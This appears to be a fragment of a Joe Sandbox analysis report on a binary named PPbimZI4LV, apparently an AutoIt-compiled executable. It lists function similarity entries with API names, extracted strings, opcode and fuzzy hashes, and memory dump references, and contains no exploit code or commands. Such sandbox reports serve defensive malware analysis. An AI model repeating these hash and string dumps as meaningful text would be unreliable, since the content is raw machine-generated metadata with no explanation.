                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: 0$0x%p
                                                                      • API String ID: 3215553584-2479247192
                                                                      • Opcode ID: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                      • Instruction ID: 42130214740c6214d14d930103242497c2a10e78b2b5116142f9200496c4b04f
                                                                      • Opcode Fuzzy Hash: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                      • Instruction Fuzzy Hash: 3F81E522A1C2036AEB64BA25914267D2390EF61B44F541631DD2EF7697FF2DE846FF00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable is not of type 'Object'.
                                                                      • API String ID: 0-1840281001
                                                                      • Opcode ID: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
                                                                      • Instruction ID: 2c26bf155b5ba57348e7eaa5f7159718db90bedac219474e813a79cc19e0201a
                                                                      • Opcode Fuzzy Hash: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
                                                                      • Instruction Fuzzy Hash: C9524A72A0C6429AFB10FF65C0822FD27A1AB49788F504531DE1EE7A97EF38E545E350
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: FileInternetRead_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 101623796-0
                                                                      • Opcode ID: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                      • Instruction ID: 3b027d7eef1226e236e476c616449f67125383b7bbc3606e12f67bfe3e326f34
                                                                      • Opcode Fuzzy Hash: c3326f14f3a704366430a438f9a2af4b616e46cbc6777093e0014b63cfdf3a9b
                                                                      • Instruction Fuzzy Hash: 3F21A422F0C79242FB64FA11A0117B92350FB85B84F945235DA8CD7B86EF3CE941DB40
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: BlockInput
                                                                      • String ID:
                                                                      • API String ID: 3456056419-0
                                                                      • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                      • Instruction ID: 333757575bec944d8e9dbc8eb0d5b86d9c11ad8c8cb1b1bfa7003d46500149e5
                                                                      • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                      • Instruction Fuzzy Hash: BCE06D32B1C60286EB44BF62E1862BA62A0AB88B84F145434DA1EC7797EF7CD4949700
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                      • Instruction ID: b7c8322e63f13f4fdb926ffca6c0d7d4edc8f2d3e699cf14317cea3e3b8e7385
                                                                      • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
                                                                      • Instruction Fuzzy Hash: ABC012B161C652D9E760EF24D8891DC3330F70031CF800021E60E9E869AF78C248D300
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                      • Instruction ID: 48cfd89916b9908ff4bd618dbef7297f6cca675beb372ed0f9f148a0bd564bf7
                                                                      • Opcode Fuzzy Hash: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
                                                                      • Instruction Fuzzy Hash: 3E41DF33718B4886EA04EF2AD5252A963A1BB4DFD0B49A032DE0ED7755EF3CD482D300
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      • Opcode ID: cf50d128dd3344e2a26665cf24b57cc892866eab895f7b642e8f36e24e0f0ced
                                                                      • Instruction ID: 272292ad68524bea9539ec9314d6808147225454b0897f6b6b8d862a12ae9eec
                                                                      • Opcode Fuzzy Hash: cf50d128dd3344e2a26665cf24b57cc892866eab895f7b642e8f36e24e0f0ced
                                                                      • Instruction Fuzzy Hash: F4B09220E0BA02C2EA483B116C8721422A4BF48700F98823AC10CE0320EF2C20E96B50
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4b43b05b4d174de04649b256e334c2e39119974175c185e79b62e938d94deaa
                                                                      • Instruction ID: 111c248c8bade9b7468279128d90f494d17c5d0f74d08e205750aa948a2bd957
                                                                      • Opcode Fuzzy Hash: a4b43b05b4d174de04649b256e334c2e39119974175c185e79b62e938d94deaa
                                                                      • Instruction Fuzzy Hash: 7952B4B2A0C64281FA68FB15D09A67D23A5EF4DB84F154535DA1EE7A83EF3CE440E740
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_task
                                                                      • String ID:
                                                                      • API String ID: 118556049-0
                                                                      • Opcode ID: b0ee8499692bb5f0e66cf560804eec7270357b5d033001915289984488a2624d
                                                                      • Instruction ID: 16d7806f14ca5801cfb4cd81fb4dd8504b7e540ea14dae8525547f80acabaaa1
                                                                      • Opcode Fuzzy Hash: b0ee8499692bb5f0e66cf560804eec7270357b5d033001915289984488a2624d
                                                                      • Instruction Fuzzy Hash: 6A526A72B0DA428AEB10FF65D1552BC23A1EB44B98F508635DE1DE77D6EE38E405D380
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                      • Instruction ID: ef5fe0df7cf36c67bc0c73481ba7eece5284dfd891f5980408aa8aca5e062081
                                                                      • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                      • Instruction Fuzzy Hash: 59423122D2DE4A85E693BF75A4536396724BF563C1F418337E80EF6652FF2CA442A700
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                      • Instruction ID: 3c9e060af515ed8b37b44f3ed44d595c694e441a73db8b9048adc13a5d71c6fb
                                                                      • Opcode Fuzzy Hash: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
                                                                      • Instruction Fuzzy Hash: 6B713C22E0D64286F774BA29858273C6291AF80370F142638DA5DE76C7FE7DE841A780
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                      • Instruction ID: e955881dfd40e029dd68578035d2d482264ea615a9aee42510eb22cd78ba3f62
                                                                      • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                      • Instruction Fuzzy Hash: 0FF04472B182558ADB94AF2CA44362977A0E708380B908039D589D3E44DE3C90919F14
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 3521893082-0
                                                                      • Opcode ID: fe06bb78312fff6951394ff3b716a9e64ae5b32195cd69004ecd3670ec3cc0ab
                                                                      • Instruction ID: 5e6f534f6bb167d8116a75f2ac129be5278b99f08e20ec0eea99c2542c9aff55
                                                                      • Opcode Fuzzy Hash: fe06bb78312fff6951394ff3b716a9e64ae5b32195cd69004ecd3670ec3cc0ab
                                                                      • Instruction Fuzzy Hash: CDA1B032F0CA1286FB54BBA1D84667C2761BB48BA5F104234CE2EE7BD6EF3C94449740
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: tooltips_class32
                                                                      • API String ID: 698492251-1918224756
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                      • String ID: @
                                                                      • API String ID: 3869813825-2766056989
                                                                      Similarity
                                                                      • API ID: Color$LongWindow$ModeObjectStockText
                                                                      • String ID:
                                                                      • API String ID: 554392163-0
                                                                      Similarity
                                                                      • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 222038402-1459072770
                                                                      Similarity
                                                                      • API ID: BuffCharMessageSendUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 3974292440-4258414348
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 2091158083-3440237614
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                      • API String ID: 2610073882-3931177956
                                                                      Similarity
                                                                      • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                      • String ID: aut
                                                                      • API String ID: 130057722-3010740371
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                      • String ID: tooltips_class32
                                                                      • API String ID: 2443926738-1918224756
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID:
                                                                      • API String ID: 2598888154-3916222277
                                                                      • Opcode ID: e1ea9e16f9a9bfdaed1ffffacebf4c97c95e32c76797c3317cfc9a85c4ad152f
                                                                      • Instruction ID: c9239d9d5c96c2a2393bf2fe3a50af870559215e8b535d784abbcd07288af735
                                                                      • Opcode Fuzzy Hash: e1ea9e16f9a9bfdaed1ffffacebf4c97c95e32c76797c3317cfc9a85c4ad152f
                                                                      • Instruction Fuzzy Hash: 8E517836B18641CBE790EF75E445AAE77B1F748B88F008129EE49A7B18DF38D419CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 2706829360-2785691316
                                                                      • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                      • Instruction ID: 0ff424095d2f82dedc44795667c52fac5180f39d41abcef57390bd1dde647748
                                                                      • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                      • Instruction Fuzzy Hash: 61516332B29A5689EB44FF65D8826BC2770FB84B89F444031DE0ED7666EF38D449D740
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF6439BFD7B), ref: 00007FF6439C1143
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 3964851224-909552448
                                                                      • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                      • Instruction ID: 3bc9077d80eaa8d9eea4394ca43321feb9e31d04e314a2ee7cf7856ca2bbc215
                                                                      • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                      • Instruction Fuzzy Hash: 97E19312F0CA9781EE60BB65D8422B92391BF10B98B444535DB2EE77D6FE3CE945E304
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                      • String ID: *.*
                                                                      • API String ID: 4125642244-438819550
                                                                      • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                      • Instruction ID: 3a03bfa12ad0f2c49f47458e36f11ef8763e8332733474b25024162d550e7318
                                                                      • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                      • Instruction Fuzzy Hash: EC818122A1CA8286EB54FF15D8426BD67A0FB44B84F840136DA4EE7B96FF7CD544E700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                      • String ID: P
                                                                      • API String ID: 1460738036-3110715001
                                                                      • Opcode ID: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
                                                                      • Instruction ID: f8a9f7b5ef8ef1f1b1fb316e0bd2a0800104a69e777b688bd5b4621808ab8dbe
                                                                      • Opcode Fuzzy Hash: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
                                                                      • Instruction Fuzzy Hash: F771D222A0C6828AF760FF2594462BD27A1FF84768F544431DA4EE7796EF7CE446E700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: LoadStringwprintf
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 3297454147-3080491070
                                                                      • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                      • Instruction ID: 13f1093e819b38db25010638aec051aa893a58563b9ef94e1d0757b77f76417c
                                                                      • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                      • Instruction Fuzzy Hash: B3616F31B1CA9296EB00FB64E9825ED6361FB84744F901432EA4DE369BEF7CE506D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 4051287042-2268648507
                                                                      • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                      • Instruction ID: b1e9f68b495a2cdc1b854402ddc31afc72ef012e2a3a7de111729353deaba124
                                                                      • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                      • Instruction Fuzzy Hash: 35516F22B1CA4296EB00FB64E8434ED6361FF94794B905432E90DE769BEF7CE50AD740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                      • String ID: BUTTON
                                                                      • API String ID: 3935177441-3405671355
                                                                      • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                      • Instruction ID: 43b4fdac63e6ab6fe84067f77cb6ca269cc3b1859294d73b890aa4bf1eba2a0a
                                                                      • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                      • Instruction Fuzzy Hash: A5316724A1DA07C6FB50BF21F8977352361AF88748F084030D90EE67E6EF2CE484AB11
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 1974058525-0
                                                                      • Opcode ID: dcc26eb72664b9d1949b187f4fad04aff093ad4780d9238f6c635ec0504560de
                                                                      • Instruction ID: 4f965f5c136facb4769614538e1d4087f63af873c96ce7c790b5bf90ece24180
                                                                      • Opcode Fuzzy Hash: dcc26eb72664b9d1949b187f4fad04aff093ad4780d9238f6c635ec0504560de
                                                                      • Instruction Fuzzy Hash: 33918931A0EA0285FF50FF65A9926B837A4BF84B84F580535C91EE7256EF3CE490A350
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                      • Instruction ID: f209ce75afd197823ea919474c3cbc84d06626ff7ef97f9295d6d177679bd1c8
                                                                      • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                      • Instruction Fuzzy Hash: 4B617272B186418BE754EF6AE44566D77A2FB88B84F508139DE09E3F58EF3CD9058B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharDriveLowerTypewcscpy
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 1561581874-1000479233
                                                                      • Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                      • Instruction ID: f8b03d0b07425e523b08439673af793934d4e3734ca48ba7db8fae22374a861d
                                                                      • Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                                      • Instruction Fuzzy Hash: 8FD10522E0CA9641EA20BB15D5421B963A1FF94BD4F604331D95DE3BD6FF3CE955A300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 4010642439-1241985126
                                                                      • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                      • Instruction ID: 7f1e5c628798da8d87e795e83222f56fcdbee8cb90d3b4b386fed95d94326b9f
                                                                      • Opcode Fuzzy Hash: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                      • Instruction Fuzzy Hash: E4A1D423B0C6428BEA24BF15E4466B96361FF85784F444035CA9EE3B96EF3DE905DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                      • String ID: P
                                                                      Similarity
                                                                      • API ID: LoadStringwprintf
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      Similarity
                                                                      • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                      • String ID: static
                                                                      Similarity
                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      APIs
                                                                        • Part of subcall function 00007FF643926838: CreateFileW.KERNELBASE ref: 00007FF6439268A2
                                                                        • Part of subcall function 00007FF643944380: GetCurrentDirectoryW.KERNEL32(?,00007FF64392E817), ref: 00007FF64394439C
                                                                        • Part of subcall function 00007FF6439256D4: GetFullPathNameW.KERNEL32(?,00007FF6439256C1,?,00007FF643927A0C,?,?,?,00007FF64392109E), ref: 00007FF6439256FF
                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF64392E8B0
                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF64392E9FA
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      Similarity
                                                                      • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                      • String ID: 5$Ping
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleStringwprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      Similarity
                                                                      • API ID: wcscpy$CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      Similarity
                                                                      • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                      • String ID:
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                      • Instruction ID: 5901626f0c66c76dc4acb5ed28629bf08087a0fecceef2264f1cd41e63a34602
                                                                      • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                      • Instruction Fuzzy Hash: 6D317334F0C612C6EB61BF25A84663976A1AF48750F104038CD4EE7B95FF7DE889AB10
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Virtual$MessagePostSleepThread$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 685491774-0
                                                                      • Opcode ID: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                      • Instruction ID: e9901a1636e0ddd00282d56e8e797181c53bb610a777e5efffcd6c5907e8b9c2
                                                                      • Opcode Fuzzy Hash: 218ae80792710925bb17cb5ea99adcd606458d8e9e9d8c7235401f523141f2b8
                                                                      • Instruction Fuzzy Hash: DB11AF36B0CA0282F744BB66E89A56D2261AFCCB80F409038CA5EDBB56EF3DD4559750
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 0-1603158881
                                                                      • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                      • Instruction ID: 05b96a0dba293261bcf9c69e7cd443f0a4b4a720d0fa5eaa064e04bb6f7c6edb
                                                                      • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                      • Instruction Fuzzy Hash: 0112B363B2DA4391FA5CBF20E8032F96291BFA4744F845531DA1FE6292FF3CE555A200
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Variant$Init$Clear
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                      • API String ID: 3467423407-1765764032
                                                                      • Opcode ID: ea568adb244a7073c7588fd76bcbdbb876fa72eb7a4f8d817ce143bae060e33b
                                                                      • Instruction ID: b572c6824d89e475e1ab4815ec2267b6a8b33da3d0ed0352ceb67c0758aa3a1b
                                                                      • Opcode Fuzzy Hash: ea568adb244a7073c7588fd76bcbdbb876fa72eb7a4f8d817ce143bae060e33b
                                                                      • Instruction Fuzzy Hash: E7A19D36A0CB4186EB20BF65E4416AD67A0FF88B98F540232DA4DEB756EF3CD545D700
                                                                      APIs
                                                                      Strings
                                                                      Similarity
